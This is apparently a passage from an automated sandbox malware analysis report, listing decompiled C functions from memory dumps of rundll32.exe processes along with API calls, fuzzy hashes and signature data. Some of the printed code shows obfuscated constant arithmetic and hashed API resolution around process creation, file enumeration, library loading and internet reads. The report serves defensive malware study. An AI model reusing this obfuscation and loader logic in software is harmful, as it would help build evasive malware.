				_v8 = _v8 | 0x71158a30;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0xbff3b541;
				E0463CDA7(0x299, _t49, 0xbd10ff8e, _t49, 0xac36ae4f);
				ExitProcess(0);
			}

0x0462b931
0x0462b935
0x0462b939
0x0462b940
0x0462b947
0x0462b94e
0x0462b965
0x0462b968
0x0462b96f
0x0462b976
0x0462b97d
0x0462b981
0x0462b985
0x0462b98c
0x0462b993
0x0462b99a
0x0462b9a1
0x0462b9a8
0x0462b9af
0x0462b9b6
0x0462b9bd
0x0462b9c1
0x0462b9d9
0x0462b9e3

APIs

ExitProcess.KERNEL32(00000000), ref: 0462B9E3

Strings

j, xrefs: 0462B985

Memory Dump Source

Source File: 00000003.00000002.348521734.0000000004621000.00000020.00000001.sdmp, Offset: 04620000, based on PE: true

Associated: 00000003.00000002.348514487.0000000004620000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.348544649.0000000004645000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.348550176.0000000004647000.00000002.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID: j
API String ID: 621844428-32252576
Opcode ID: dec89632a3e992566f8b7b614a77279a9f1abb67e74a073da497acca5c334539
Instruction ID: 0404d9fc3070418d2b10363aa066a84d3412327eafe2c7a40d116f0d47a77d31
Opcode Fuzzy Hash: dec89632a3e992566f8b7b614a77279a9f1abb67e74a073da497acca5c334539
Instruction Fuzzy Hash: 7A11DFB5D0030DABDB44DFE5C84AADEBBB0FB24718F108688D421B6254D3B91B48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 046256E8, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E046256E8(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t51;
				int _t60;
				signed int _t62;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0462DD01(_t51);
				_v24 = _v24 & 0x00000000;
				_v32 = 0xd9c80a;
				_v28 = 0xb7f6b0;
				_v16 = 0x7105db;
				_v16 = _v16 + 0xffff830b;
				_v16 = _v16 + 0xc4b8;
				_v16 = _v16 | 0x9182befb;
				_v16 = _v16 ^ 0x91f535f3;
				_v12 = 0x57e3ed;
				_v12 = _v12 | 0x44bc7d70;
				_v12 = _v12 ^ 0xbd9f04b5;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x01f948ad;
				_v20 = 0x651f43;
				_v20 = _v20 | 0xac6aa396;
				_v20 = _v20 ^ 0xac61bd64;
				_v8 = 0xe3ccd1;
				_v8 = _v8 ^ 0xf2e8fa35;
				_v8 = _v8 ^ 0xaa4c870b;
				_t62 = 0x3c;
				_v8 = _v8 / _t62;
				_v8 = _v8 ^ 0x017f2f06;
				E0463CDA7(0x220, _t62, 0xbd10ff8e, _t62, 0x9839abd1);
				_t60 = lstrcmpiW(_a12, _a4); // executed
				return _t60;
			}

0x046256ee
0x046256f1
0x046256f4
0x046256f7
0x046256fc
0x04625701
0x04625708
0x04625711
0x04625718
0x0462571f
0x04625726
0x0462572d
0x04625734
0x0462573b
0x04625742
0x04625749
0x04625750
0x04625754
0x0462575b
0x04625762
0x04625769
0x04625770
0x04625777
0x0462577e
0x0462578a
0x04625792
0x04625795
0x046257b4
0x046257c2
0x046257c7

APIs

lstrcmpiW.KERNELBASE(AC61BD64,01F948AD), ref: 046257C2

Strings

W, xrefs: 0462573B

Memory Dump Source

Source File: 00000003.00000002.348521734.0000000004621000.00000020.00000001.sdmp, Offset: 04620000, based on PE: true

Associated: 00000003.00000002.348514487.0000000004620000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.348544649.0000000004645000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.348550176.0000000004647000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID: W
API String ID: 1586166983-2402654308
Opcode ID: 7fe8527dd198de4a5eb106a73081553d919630e26445ef576918f4fc94d960a4
Instruction ID: 92558dfc2ebb4abdf30bd2575cd41ed0b13d8c1054ea111705fa2154df11a18f
Opcode Fuzzy Hash: 7fe8527dd198de4a5eb106a73081553d919630e26445ef576918f4fc94d960a4
Instruction Fuzzy Hash: 352103B6C10209FBDF05DFE4C94A89EBFB1FB04304F108088E525A6260D3B19B54AF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6648 Parent PID: 5116 rundll32.exeCOMMON

Executed Functions

Function 0407BA2C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
processCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0407BA2C(void* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a36, intOrPtr _a40, int _a44, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t45;
				int _t52;

				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E0406DD01(_t45);
				_v20 = 0x4137cb;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x000629e3;
				_v8 = 0xe23209;
				_v8 = _v8 | 0xb5cb40f7;
				_v8 = _v8 + 0x67bb;
				_v8 = _v8 ^ 0xb5e315b2;
				_v16 = 0x232e3c;
				_v16 = _v16 | 0x47fb43a0;
				_v16 = _v16 ^ 0x47fac30a;
				_v12 = 0x992608;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x26445c1d;
				E0407CDA7(0x1ae, __ecx, 0xbd10ff8e, __ecx, 0x98a9b13a);
				_t52 = CreateProcessW(_a36, _a20, 0, 0, _a44, 0, 0, 0, _a60, _a4); // executed
				return _t52;
			}

0x0407ba33
0x0407ba38
0x0407ba39
0x0407ba3c
0x0407ba3f
0x0407ba40
0x0407ba41
0x0407ba44
0x0407ba47
0x0407ba4a
0x0407ba4d
0x0407ba50
0x0407ba53
0x0407ba56
0x0407ba59
0x0407ba5c
0x0407ba5d
0x0407ba60
0x0407ba61
0x0407ba62
0x0407ba67
0x0407ba71
0x0407ba75
0x0407ba7c
0x0407ba83
0x0407ba8a
0x0407ba91
0x0407ba98
0x0407ba9f
0x0407baa6
0x0407baad
0x0407bab4
0x0407bab8
0x0407badc
0x0407baf8
0x0407bafe

APIs

CreateProcessW.KERNELBASE(?,?,00000000,00000000,?,00000000,00000000,00000000,?,26445C1D), ref: 0407BAF8

Strings

<.#, xrefs: 0407BA98
2, xrefs: 0407BA7C

Memory Dump Source

Source File: 00000006.00000002.351834731.0000000004061000.00000020.00000001.sdmp, Offset: 04060000, based on PE: true

Associated: 00000006.00000002.351816884.0000000004060000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.351859542.0000000004085000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.351871748.0000000004087000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID: 2$<.#
API String ID: 963392458-3491762637
Opcode ID: 3c2a5807b2f49b0e2827f103b7ab1b6f82503b6a15dab8673ed5ccabc0516bb4
Instruction ID: fe0a33968252f8f384ad893d53aaab5adbe51bd2341ad88afdb3417a9098021e
Opcode Fuzzy Hash: 3c2a5807b2f49b0e2827f103b7ab1b6f82503b6a15dab8673ed5ccabc0516bb4
Instruction Fuzzy Hash: 6F21B27280121CBBDF16AF95CD0ACDE7F76FF09398F058148FA1962120D3769A64EB90

Uniqueness

Uniqueness Score: -1.00%

Function 0406B92B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0406B92B() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x914a81;
				_v32 = 0x49100;
				_v16 = 0xbcde59;
				_v16 = _v16 ^ 0x3502d399;
				_v16 = _v16 * 0x19;
				_v16 = _v16 | 0x93204948;
				_v16 = _v16 ^ 0xbfa2cd8a;
				_v12 = 0xd6e69c;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0xe46a;
				_v12 = _v12 ^ 0x00021647;
				_v20 = 0x6d6daa;
				_v20 = _v20 + 0xffff1abc;
				_v20 = _v20 ^ 0x00614392;
				_v8 = 0x85be29;
				_v8 = _v8 + 0xbebc;
				_v8 = _v8 | 0x71158a30;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0xbff3b541;
				E0407CDA7(0x299, _t49, 0xbd10ff8e, _t49, 0xac36ae4f);
				ExitProcess(0);
			}

0x0406b931
0x0406b935
0x0406b939
0x0406b940
0x0406b947
0x0406b94e
0x0406b965
0x0406b968
0x0406b96f
0x0406b976
0x0406b97d
0x0406b981
0x0406b985
0x0406b98c
0x0406b993
0x0406b99a
0x0406b9a1
0x0406b9a8
0x0406b9af
0x0406b9b6
0x0406b9bd
0x0406b9c1
0x0406b9d9
0x0406b9e3

APIs

ExitProcess.KERNEL32(00000000), ref: 0406B9E3

Strings

j, xrefs: 0406B985

Memory Dump Source

Source File: 00000006.00000002.351834731.0000000004061000.00000020.00000001.sdmp, Offset: 04060000, based on PE: true

Associated: 00000006.00000002.351816884.0000000004060000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.351859542.0000000004085000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.351871748.0000000004087000.00000002.00000001.sdmp Download File

Similarity

API ID: ExitProcess
String ID: j
API String ID: 621844428-32252576
Opcode ID: dec89632a3e992566f8b7b614a77279a9f1abb67e74a073da497acca5c334539
Instruction ID: 8ae47136b7339269a0d14bb1c43180e7182bf49cb93477f327c75570be9bf3e9
Opcode Fuzzy Hash: dec89632a3e992566f8b7b614a77279a9f1abb67e74a073da497acca5c334539
Instruction Fuzzy Hash: 2111DFB5D0030DABDB44DFE5C84AADEBBB0FB24718F108688D421B6254D3B91B48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 040656E8, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E040656E8(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t51;
				int _t60;
				signed int _t62;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0406DD01(_t51);
				_v24 = _v24 & 0x00000000;
				_v32 = 0xd9c80a;
				_v28 = 0xb7f6b0;
				_v16 = 0x7105db;
				_v16 = _v16 + 0xffff830b;
				_v16 = _v16 + 0xc4b8;
				_v16 = _v16 | 0x9182befb;
				_v16 = _v16 ^ 0x91f535f3;
				_v12 = 0x57e3ed;
				_v12 = _v12 | 0x44bc7d70;
				_v12 = _v12 ^ 0xbd9f04b5;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x01f948ad;
				_v20 = 0x651f43;
				_v20 = _v20 | 0xac6aa396;
				_v20 = _v20 ^ 0xac61bd64;
				_v8 = 0xe3ccd1;
				_v8 = _v8 ^ 0xf2e8fa35;
				_v8 = _v8 ^ 0xaa4c870b;
				_t62 = 0x3c;
				_v8 = _v8 / _t62;
				_v8 = _v8 ^ 0x017f2f06;
				E0407CDA7(0x220, _t62, 0xbd10ff8e, _t62, 0x9839abd1);
				_t60 = lstrcmpiW(_a12, _a4); // executed
				return _t60;
			}

0x040656ee
0x040656f1
0x040656f4
0x040656f7
0x040656fc
0x04065701
0x04065708
0x04065711
0x04065718
0x0406571f
0x04065726
0x0406572d
0x04065734
0x0406573b
0x04065742
0x04065749
0x04065750
0x04065754
0x0406575b
0x04065762
0x04065769
0x04065770
0x04065777
0x0406577e
0x0406578a
0x04065792
0x04065795
0x040657b4
0x040657c2
0x040657c7

APIs

lstrcmpiW.KERNELBASE(AC61BD64,01F948AD), ref: 040657C2

Strings

W, xrefs: 0406573B

Memory Dump Source

Source File: 00000006.00000002.351834731.0000000004061000.00000020.00000001.sdmp, Offset: 04060000, based on PE: true

Associated: 00000006.00000002.351816884.0000000004060000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.351859542.0000000004085000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.351871748.0000000004087000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcmpi
String ID: W
API String ID: 1586166983-2402654308
Opcode ID: 7fe8527dd198de4a5eb106a73081553d919630e26445ef576918f4fc94d960a4
Instruction ID: 7105610b9bf84bdd8c5c6b39023b6174b84bda5c0ff34cddc4da960c31efba0b
Opcode Fuzzy Hash: 7fe8527dd198de4a5eb106a73081553d919630e26445ef576918f4fc94d960a4
Instruction Fuzzy Hash: AB21E3B6C11209EBEF45DFE4C94A8DEBFB5FB04308F108188E525B6260D3B59B54AF91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 1972 Parent PID: 6648 rundll32.exeCOMMON

Executed Functions

Function 041818CA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E041818CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a16, void* _a20, DWORD* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				int _t60;
				signed int _t62;
				void* _t66;

				_push(_a24);
				_t66 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0417DD01(_t50);
				_v12 = 0xec01;
				_v12 = _v12 ^ 0x99d566cc;
				_v12 = _v12 + 0xc03a;
				_v12 = _v12 << 3;
				_v12 = _v12 ^ 0xcebaf207;
				_v20 = 0x756b3b;
				_v20 = _v20 + 0xffff61d2;
				_v20 = _v20 | 0x57e00d50;
				_v20 = _v20 ^ 0x57f16586;
				_v8 = 0xa0384e;
				_v8 = _v8 + 0x6b2b;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0x960b;
				_v8 = _v8 ^ 0xa37d461f;
				_v16 = 0xe3807d;
				_t62 = 0x32;
				_v16 = _v16 * 0x28;
				_v16 = _v16 / _t62;
				_v16 = _v16 ^ 0x00b7d9fc;
				E0418CDA7(0x18d, _t62, 0x2d8c49fa, _t62, 0xd15b3dcd);
				_t60 = InternetReadFile(_a20, _t66, _a16, _a24); // executed
				return _t60;
			}

0x041818d1
0x041818d4
0x041818d6
0x041818d9
0x041818dc
0x041818df
0x041818e2
0x041818e5
0x041818e7
0x041818ec
0x041818f6
0x041818ff
0x04181906
0x0418190a
0x04181911
0x04181918
0x0418191f
0x04181926
0x0418192d
0x04181934
0x0418193b
0x0418193f
0x04181946
0x0418194d
0x0418195a
0x04181961
0x0418196e
0x04181971
0x0418198a
0x0418199c
0x041819a2

APIs

InternetReadFile.WININET(?,?,?,?), ref: 0418199C

Strings

+k, xrefs: 04181934
PW, xrefs: 0418191F

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: FileInternetRead
String ID: +k$PW
API String ID: 778332206-1085970709
Opcode ID: 64f84011b3d11a8cf28e7d0523ad41a1c44cc28fa3253359879aaa3d2c096861
Instruction ID: b97043350149b681f9cd2fffe96efb1ed16721db1b2adb4fd64014ef6092d6be
Opcode Fuzzy Hash: 64f84011b3d11a8cf28e7d0523ad41a1c44cc28fa3253359879aaa3d2c096861
Instruction Fuzzy Hash: A4213472C00209FBEF08DFA8C94A8DEBFB5EB04344F108188E92562260D3B65A649F90

Uniqueness

Uniqueness Score: -1.00%

Function 0417D29B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0417D29B(void* __ecx, int __edx) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t36;
				int _t39;

				_t39 = __edx;
				_v16 = 0x625a8;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0xa4fb4599;
				_v16 = _v16 ^ 0xa7e46a21;
				_v12 = 0x766173;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xa1cd;
				_v12 = _v12 ^ 0x0003d3b0;
				_v8 = 0xe8bd4f;
				_v8 = _v8 + 0xb389;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000734ea;
				_v20 = 0x508d57;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x00217007;
				E0418CDA7(0x2e0, __ecx, 0xbd10ff8e, __ecx, 0x9acbd906);
				_t36 = CreateToolhelp32Snapshot(_t39, 0); // executed
				return _t36;
			}

0x0417d2a2
0x0417d2a4
0x0417d2ab
0x0417d2af
0x0417d2b6
0x0417d2bd
0x0417d2c4
0x0417d2c8
0x0417d2cf
0x0417d2d6
0x0417d2dd
0x0417d2e4
0x0417d2e8
0x0417d2ef
0x0417d2f6
0x0417d2f9
0x0417d31d
0x0417d328
0x0417d32e

APIs

CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 0417D328

Strings

sav, xrefs: 0417D2BD

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateSnapshotToolhelp32
String ID: sav
API String ID: 3332741929-1819705844
Opcode ID: cc2020c26674928218b8696151b3673b433ae1b2fdb89df7888d1922bf4422a9
Instruction ID: 321d8c8b8557bbfead69656f11da5a2ba8682048c929257e459c7e16c3be3e7e
Opcode Fuzzy Hash: cc2020c26674928218b8696151b3673b433ae1b2fdb89df7888d1922bf4422a9
Instruction Fuzzy Hash: 92011372C4161CBBEB05EBD4C84A89EBBB4EB05308F108188E425B6240D7B91B15CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0418B2CC, Relevance: 1.6, APIs: 1, Instructions: 53
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0418B2CC(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, struct _WIN32_FIND_DATAW* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				void* _t51;
				signed int _t53;
				WCHAR* _t57;

				_push(_a12);
				_t57 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0417DD01(_t39);
				_v16 = 0xd022d9;
				_t53 = 0x3d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x61eac5e6;
				_v12 = 0x38bf9f;
				_v12 = _v12 / _t53;
				_v12 = _v12 * 0x65;
				_v12 = _v12 ^ 0x005dda95;
				_v20 = 0xbcafea;
				_v20 = _v20 * 0x2a;
				_v20 = _v20 ^ 0x1ef2be58;
				_v8 = 0x812a2b;
				_v8 = _v8 | 0xee21e4c1;
				_v8 = _v8 + 0xffffb420;
				_v8 = _v8 ^ 0xeea5436a;
				E0418CDA7(0x2ea, _t53, 0xbd10ff8e, _t53, 0xa62ac85a);
				_t51 = FindFirstFileW(_t57, _a12); // executed
				return _t51;
			}

0x0418b2d3
0x0418b2d6
0x0418b2d8
0x0418b2db
0x0418b2df
0x0418b2e0
0x0418b2e5
0x0418b2f7
0x0418b2f8
0x0418b2fb
0x0418b2ff
0x0418b306
0x0418b317
0x0418b32a
0x0418b32d
0x0418b334
0x0418b33f
0x0418b342
0x0418b349
0x0418b350
0x0418b357
0x0418b35e
0x0418b371
0x0418b37d
0x0418b383

APIs

FindFirstFileW.KERNEL32(?,1EF2BE58), ref: 0418B37D

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: a46c5ef85f242df9753157ffba288c59bf8c158fbc25c8ab4c63f765bb1ded5a
Instruction ID: c5d852a2e00cd3005c98421da45fd2d41cb05672dcb00b32723de7521fdffde5
Opcode Fuzzy Hash: a46c5ef85f242df9753157ffba288c59bf8c158fbc25c8ab4c63f765bb1ded5a
Instruction Fuzzy Hash: 2B1144B1C0021DAFDB04EFA4C8868AEBBB5FF44304F10C189E925AB250E3B16B508F90

Uniqueness

Uniqueness Score: -1.00%

Function 0417B6A7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0417B6A7(void* __ecx, struct _WIN32_FIND_DATAW* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t36;
				int _t45;
				struct _WIN32_FIND_DATAW* _t48;

				_push(_a16);
				_t48 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0417DD01(_t36);
				_v16 = 0x7fb89a;
				_v16 = _v16 * 0x42;
				_v16 = _v16 | 0x75ef5560;
				_v16 = _v16 ^ 0x75eb6af6;
				_v12 = 0x94943e;
				_v12 = _v12 + 0xffff770c;
				_v12 = _v12 * 0x1f;
				_v12 = _v12 ^ 0x11ec5a51;
				_v8 = 0x70e96e;
				_v8 = _v8 + 0x97bb;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x8126b705;
				_v20 = 0x782947;
				_v20 = _v20 | 0x001cb1cf;
				_v20 = _v20 ^ 0x007e5df6;
				E0418CDA7(0x133, __ecx, 0xbd10ff8e, __ecx, 0x80ff2251);
				_t45 = FindNextFileW(_a4, _t48); // executed
				return _t45;
			}

0x0417b6ae
0x0417b6b1
0x0417b6b3
0x0417b6b6
0x0417b6b9
0x0417b6bc
0x0417b6bd
0x0417b6be
0x0417b6c3
0x0417b6d7
0x0417b6da
0x0417b6e1
0x0417b6e8
0x0417b6ef
0x0417b705
0x0417b708
0x0417b70f
0x0417b716
0x0417b71d
0x0417b721
0x0417b728
0x0417b72f
0x0417b736
0x0417b749
0x0417b755
0x0417b75b

APIs

FindNextFileW.KERNELBASE(11EC5A51), ref: 0417B755

Strings

np, xrefs: 0417B70F
G)x, xrefs: 0417B728
`Uu, xrefs: 0417B6DA

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: FileFindNext
String ID: G)x$`Uu$np
API String ID: 2029273394-320429977
Opcode ID: fd3dd4f76d672050b948c0e6ee5c1046458b68b16a72fed1f4c3cbfaf1993d1a
Instruction ID: 978e8745350374efa3951fcb52a4e0b0c078944c6e87484b175d5e0c40a1e159
Opcode Fuzzy Hash: fd3dd4f76d672050b948c0e6ee5c1046458b68b16a72fed1f4c3cbfaf1993d1a
Instruction Fuzzy Hash: 141104B1C0121CFBCF04EFA9C9868DEBFB4EF04314F508199E815A6261E3B55B109F90

Uniqueness

Uniqueness Score: -1.00%

Function 04174F6F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E04174F6F(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				struct HINSTANCE__* _t46;
				WCHAR* _t49;

				_push(_a8);
				_t49 = __ecx;
				_push(_a4);
				_push(__ecx);
				E0417DD01(_t39);
				_v16 = 0x37435b;
				_v16 = _v16 + 0x2a77;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0x5eb7b304;
				_v16 = _v16 ^ 0xb30a943d;
				_v12 = 0x59a051;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 << 0xe;
				_v12 = _v12 | 0x994ca2bf;
				_v12 = _v12 ^ 0x995e6987;
				_v20 = 0x89a727;
				_v20 = _v20 + 0xdcf0;
				_v20 = _v20 ^ 0x0082962a;
				_v8 = 0x34100c;
				_v8 = _v8 ^ 0xed4fc9b0;
				_v8 = _v8 + 0xffffe97a;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000e19fc;
				E0418CDA7(0x3dd, __ecx, 0xbd10ff8e, __ecx, 0xc177f4dc);
				_t46 = LoadLibraryW(_t49); // executed
				return _t46;
			}

0x04174f76
0x04174f79
0x04174f7b
0x04174f7f
0x04174f80
0x04174f85
0x04174f8f
0x04174f96
0x04174f9a
0x04174fa1
0x04174fa8
0x04174faf
0x04174fb3
0x04174fb7
0x04174fbe
0x04174fc5
0x04174fcc
0x04174fd3
0x04174fda
0x04174fe1
0x04174fe8
0x04174fef
0x04174ff3
0x04175017
0x04175020
0x04175026

APIs

LoadLibraryW.KERNEL32 ref: 04175020

Strings

w*, xrefs: 04174F8F
[C7, xrefs: 04174F85

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868179228.0000000004195000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.868185482.0000000004197000.00000002.00000001.sdmp Download File

Similarity

API ID: LibraryLoad
String ID: [C7$w*
API String ID: 1029625771-564491213
Opcode ID: ef326665729df07b3209da68ebeaad9bfe761dd774cd1198dac53405cdc7b4db
Instruction ID: d0d5ad0acbba9f8ca71f020c4074c7f8cc49534d7e76ee75b00c2221db9eed78
Opcode Fuzzy Hash: ef326665729df07b3209da68ebeaad9bfe761dd774cd1198dac53405cdc7b4db
Instruction Fuzzy Hash: 1A1113B5D0121CBBDB45EBE5D94A8DEBBB4FF10308F00C189E921A6211E3B55B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 0418D65E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0418D65E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t52;
				intOrPtr* _t64;
				void* _t65;
				signed int _t67;
				signed int _t68;
				void* _t74;

				_t74 = __ecx;
				E0417DD01(_t52);
				_v20 = 0x30dce1;
				_t67 = 0xd;
				_v20 = _v20 / _t67;
				_v20 = _v20 ^ 0xfbff2b21;
				_v20 = _v20 ^ 0xfbf8e0e9;
				_v12 = 0x36d8ac;
				_t68 = 0x12;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 * 0x30;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 ^ 0x000414de;
				_v8 = 0x8d732f;
				_v8 = _v8 | 0x53e5434e;
				_t29 =  &_v8; // 0x53e5434e
				_v8 =  *_t29 / _t68;
				_v8 = _v8 + 0x4fd3;
				_v8 = _v8 ^ 0x04a39b93;
				_v16 = 0xc84735;
				_v16 = _v16 << 8;
				_v16 = _v16 | 0xf8a7bd22;
				_v16 = _v16 ^ 0xf8eb8522;
				_t64 = E0418CDA7(0x233, _t68, 0xbd10ff8e, _t68, 0x83f85f77);
				_t65 =  *_t64(_a12, 0, _a4, _t74, __ecx, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t65;
			}

0x0418d668
0x0418d67a
0x0418d67f
0x0418d690
0x0418d695
0x0418d69a
0x0418d6a1
0x0418d6a8
0x0418d6b3
0x0418d6bf
0x0418d6cc
0x0418d6cf
0x0418d6d3
0x0418d6da
0x0418d6e1
0x0418d6e8
0x0418d6ed
0x0418d6f0
0x0418d6f7
0x0418d6fe
0x0418d705
0x0418d709
0x0418d710
0x0418d723
0x0418d734
0x0418d73a

APIs

QueryFullProcessImageNameW.KERNEL32(FBF8E0E9,00000000,000414DE,?), ref: 0418D734

Strings

NCS, xrefs: 0418D6E8

Memory Dump Source

Source File: 00000008.00000002.868162424.0000000004171000.00000020.00000001.sdmp, Offset: 04170000, based on PE: true

Associated: 00000008.00000002.868156967.0000000004170000.00000004.00000001.sdmp Download File
